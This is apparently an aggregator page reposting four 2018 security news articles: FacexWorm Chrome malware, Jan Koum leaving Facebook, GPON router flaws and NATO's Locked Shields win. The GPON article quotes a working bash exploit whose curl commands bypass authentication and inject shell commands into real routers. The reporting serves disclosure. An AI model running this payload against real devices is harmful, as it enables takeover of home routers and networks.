Zicutake USA Comment | Search Articles

#History (Education) #Satellite report #Arkansas #Tech #Poker #Language and Life #Critics Cinema #Scientific #Hollywood #Future #Conspiracy #Curiosity #Washington



FacexWorm targets cryptocurrency users and spreads through Facebook Messenger

Posted: 01 May 2018 11:18 AM PDT

Social networks could be a privileged attack vector to rapidly spread a malware to a huge audience, FacexWorm targets cryptocurrency users by spreading through Facebook Messenger.

Social networks could be a privileged attack vector to rapidly spread a malware to a huge audience.

In the last hours, a new threat is spreading through leveraging an apparently harmful link for a video sent by a friend on Facebook messenger.

Security researchers from Trend Micro have spotted a malicious Chrome extension, dubbed FacexWorm, which is spreading through Facebook Messenger and targeting users of cryptocurrency trading platforms to steal their accounts' credentials and run cryptocurrency mining scripts.

“Our Cyber Safety Solutions team identified a malicious Chrome extension we named FacexWorm, which uses a miscellany of techniques to target cryptocurrency trading platforms accessed on an affected browser and propagates via Facebook Messenger.” reads the report published by Trend Micro.

According to the experts, FacexWorm was first detected in late April and appears to be linked to two other Facebook Messenger spam campaigns, one that occurred in August 2017 and a second one that was launched in December 2017 to spread the Digmine cryptocurrency miner.

Experts recently observed a spike in FacexWorm activity, the malicious code was detected in several countries, including GermanyTunisiaJapanTaiwanSouth Korea, and Spain.

FacexWorm implements several features, including stealing account credentials from websites, like Google and cryptocurrency sites, redirecting victims to rogue cryptocurrency sites, injecting cryptocurrency miners, and redirecting victims to the attacker’s referral link for cryptocurrency-related referral programs.

The following image shows the FacexWorm's infection chain:


FacexWorm propagates by links over Facebook Messenger to the friends of an affected Facebook account to redirect users to fake versions of popular video streaming websites, including YouTube. The user is encouraged to download a malicious Chrome extension as a codec extension to continue playing the video and to grant all extended permissions to complete the installation, with this trick malware can have full control for any websites the user visits.

Currently the malicious extension only Chrome users, when the malware detects a different browser it redirects the user to an innocuous-looking advertisement.

“FacexWorm is delivered through socially engineered links sent to Facebook Messenger. The links redirect to a fake YouTube page that will ask unwitting users to agree and install a codec extension (FacexWorm) in order to play the video on the page. It will then request privilege to access and change data on the opened website.” continues the report.


Once FacexWorm Chrome extension is installed on the victim’s PC, it downloads more modules from its command and control server to perform other malicious activities.

“FacexWorm is a clone of a normal Chrome extension but injected with short code containing its main routine. It downloads additional JavaScript code from the C&C server when the browser is opened,” continues the report.

“Every time a victim opens a new webpage, FacexWorm will query its C&C server to find and retrieve another JavaScript code (hosted on a Github repository) and execute its behaviors on that webpage.”

Trend Micro detailed the malicious behaviors of the malware that include:

  • Steal the user's account credentials for Google, MyMonero, and Coinhive.
  • Push a cryptocurrency scam. 
  • Conduct malicious web cryptocurrency mining.
  • Hijack cryptocurrency-related transactions.
  • Earn from cryptocurrency-related referral programs.

Pierluigi Paganini

(Security Affairs – cryptocurrency malware, Facebook)

The post FacexWorm targets cryptocurrency users and spreads through Facebook Messenger appeared first on Security Affairs.

WhatsApp co-founder Jan Koum to leave Facebook amid privacy concerns

Posted: 01 May 2018 02:16 AM PDT

Jan Koum, one of the WhatsApp founders, reportedly plans to leave the company in the wake of increasing concerns about Facebook’s approach to users’ privacy.

Jan Koum, the co-founder of WhatsApp, reportedly plans to leave the company in the wake of increasing concerns about Facebook’s privacy policy.

"It is time for me to move on . . . I'm taking some time off to do things I enjoy outside of technology, such as collecting rare air-cooled Porsches, working on my cars and playing ultimate frisbee," WhatsApp  co-founder, CEO and Facebook board member Jan Koum wrote in a Facebook post. 

Koum, who sold WhatsApp to Facebook for more than $19 billion in 2014, plans to leave the Facebook's board of directors too.

Koum did not provide further details on his decision or a timeline for his departures.

Jan Koum to leave Facebook

According to The Washington Post, this is one of the effects of the Cambridge Analytica case, clearly, Koum disagrees the way Facebook managed users’ data.

“The billionaire chief executive of WhatsApp, Jan Koum, is planning to leave the company after clashing with its parent, Facebook, over the popular messaging service's strategy and Facebook's attempts to use its personal data and weaken its encryption, according to people familiar with internal discussions.” reported the  The Washington Post.

“The independence and protection of its users' data is a core tenet of WhatsApp that Koum and his co-founder, Brian Acton, promised to preserve when they sold their tiny start-up to Facebook. It doubled down on its pledge by adding encryption in 2016. The clash over data took on additional significance in the wake of revelations in March that Facebook had allowed third parties to mishandle its users' personal information.”

Facebook CEO Mark Zuckerberg replied to Koum's decision by crediting him with teaching him "about encryption and its ability to take power from centralized systems and put it back in people's hands. Those values will always be at the heart of WhatsApp."

According to The Washington Post Koum disappointed also the Facebook executives approach to the end-to-end encryption introduced since 2016 and the possibility to weaken it to facilitate law enforcement agencies’ investigations and business use of the instant messaging app, the WhatsApp For Business program.

According to The Washington Post, other WhatsApp employees are not happy of the situation at the company and plan to leave in November, four years and a month after the Facebook acquisition, when they are allowed to exercise all their stock options under the terms of the Facebook deal.

Pierluigi Paganini

(Security Affairs – Jan Koum, WhatsApp)

The post WhatsApp co-founder Jan Koum to leave Facebook amid privacy concerns appeared first on Security Affairs.

Critical RCE vulnerability found in over a million GPON Home Routers

Posted: 01 May 2018 12:52 AM PDT

Security researchers at VPNMentor conducted a comprehensive assessment on of a number of GPON home routers and discovered a Critical remote code vulnerability that could be exploited to gain full control over them.

The researchers have found a way to bypass the authentication to access the GPON home routers (CVE-2018-10561). The experts chained this authentication bypass flaw with another command injection vulnerability (CVE-2018-10562) and were able to execute commands on the device.

GPON Home Routers hack


Analyzing the firmware of the GPON home routers, the experts found two different critical vulnerabilities (CVE-2018-10561 & CVE-2018-10562)  that could be chained to allow complete control of the vulnerable device and therefore the network. The first vulnerability exploits the authentication mechanism of the device, it could be exploited by an attacker to bypass all authentication.

The vulnerability effects the build in HTTP servers, which check for specific paths when authenticating. This allows the attacker to bypass authentication on any endpoint using a simple trick.

By appending

?images/ to the URL

the attacker can bypass the endpoint.

This works on both HTML pages and GponForm/

For instance, by inserting


the experts were able to control the GPON Home Routers.

While looking through the device functionalities, the experts noticed the diagnostic endpoint contained the ping and traceroute commands. It didn't take much to figure out that the commands can be injected using the host parameter.

“Since the router saves ping results in /tmp and transmits it to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output with the authentication bypass vulnerability.” reads the analysis published by VPNMentor.

The experts included the following bash version of the exploit code:


echo "[+] Sending the Command... "

“We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices” continues the post:

curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null
echo "[+] Waiting...."
sleep 3
echo "[+] Retrieving the ouput...."
curl -k $1/diag.html?images/ 2>/dev/null | grep 'diag_result = ' | sed -e 's/\\n/\n/g'

GPON is a very popular passive optical network device that uses fiber-optics, these devices are provided by ISPs. In the video, you can see that over one million people use this type of network system router.

Below a video PoC published by the researchers:

“We tested this vulnerability on many random GPON routers, and the vulnerability was found on all of them. Because so many people use these types of routers, this vulnerability can result in an entire network compromise.” concluded the experts.


  1. Check if your router uses the GPON network.
  2. Be aware that GPON routers can be hacked and exploited.
  3. Talk to your ISP to see what they can do to fix the bug.
  4. Warn your friends on Facebook (click here to share) and Twitter (click here to tweet).

Pierluigi Paganini

(Security Affairs – GPON Home Routers, hacking)

The post Critical RCE vulnerability found in over a million GPON Home Routers appeared first on Security Affairs.

The NATO team is the winner of the cyber defence exercise Locked Shields 2018

Posted: 30 Apr 2018 11:54 PM PDT

The NATO team is the winner of the Cyber Defence Exercise Locked Shields 2018 that took place on April 23-26 in Tallinn, Estonia.

The international live-fire cyber defence exercise Locked Shields 2018 took place on April 23-26 in Tallinn, Estonia, and the figures behind this important competition are impressive.

A total of 22 Blue Teams participated in the Locked Shields 2018 exercise, more than 1,000 experts from nearly 30 countries have tested their cyber capabilities-

Yes, I forgot to tell you that this year the winner is the team from NATO composed of 30 cyber experts, followed by France and the Czech Republic.

“The winning team excelled in all categories of the exercise. It was the first time NATO participated with a team representing different NATO agencies," said Aare Reintam, Project Manager of Technical Exercises at CCDCOE.

The NATO Cooperative Cyber Defence Centre of Excellence (CCDCOE) organizes the Locked Shields since 2010, the exercise aims to test the abilities of the team in responding to a major cyber attack.

The exercise sees a fictional country named Berylia targeted by massive and coordinated cyber attacks that hit its critical infrastructure, including Internet services provider, power grids, military airbase, telecommunication networks.

Locked Shields 2018 involved 4,000 virtualized systems and over 2,500 attacks that hit the target altogether.

The Blue Teams were tasked to preserve the operations of more than 150 complex IT systems per team, reporting incidents, executing strategic decisions and solving forensic, legal and media challenges.

"However, every single participating team deserves credit for handling the complex cyber challenges of Locked Shields. The exercise involved around 4000 virtualised systems and more than 2500 attacks altogether.” added Reintam. “In addition to keeping up more than 150 complex IT systems per team, the Blue Teams had to be efficient in reporting incidents, executing strategic decisions and solving forensic, legal and media challenges. Protection of critical infrastructure is essential for ensuring the efficient operation of both military and civilian organisations, it is the foundation of our modern digital lifestyle," 

Locked Shields 2018

More photos of Locked Shields 2018 (credits to CCDCOE, photographer Arno Mikkor)

Once again, the exercise highlighted the importance of the information sharing when dealing cyber threats and the authority to make a decision and give guidelines, carefully evaluating the potential legal implications.

“In 2018 the exercise highlighted the growing need to enhance dialogue between technical experts, civil and military participants and decision-making levels.” reads the press release published by the CCDCOE.

“CCDCOE integrates the technical and strategic game, enabling participating nations to practice the entire chain of command in the event of a severe cyber incident involving both civilian and military players.”

Cyber drills like the Locked Shields 2018 are very important occasions for tasting cyber defense abilities and processes in place to mitigate massive attacks against critical infrastructure.

Pierluigi Paganini

(Security Affairs – Locked Shields 2018, hacking)

The post The NATO team is the winner of the cyber defence exercise Locked Shields 2018 appeared first on Security Affairs.